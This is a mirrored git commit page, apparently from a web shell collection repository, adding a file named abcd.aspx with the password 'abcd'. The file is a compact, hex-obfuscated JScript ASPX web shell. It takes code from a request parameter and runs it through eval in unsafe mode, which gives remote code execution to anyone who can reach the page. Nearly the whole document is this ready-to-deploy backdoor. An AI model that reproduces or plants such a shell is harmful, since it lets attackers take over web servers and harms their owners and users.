mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
Create abcd.aspx
password:abcd
This commit is contained in:
parent
247e779b85
commit
4ca9601188
1 changed files with 5 additions and 0 deletions
5
aspx/abcd.aspx
Normal file
5
aspx/abcd.aspx
Normal file
|
@ -0,0 +1,5 @@
|
|||
<%@PAGE LANGUAGE=JSCRIPT%>
|
||||
<%var PAY:String=
|
||||
Request["\x61\x62\x63\x64"];eval
|
||||
(PAY,"\x75\x6E\x73\x61"+
|
||||
"\x66\x65");%>
|
Loading…
Reference in a new issue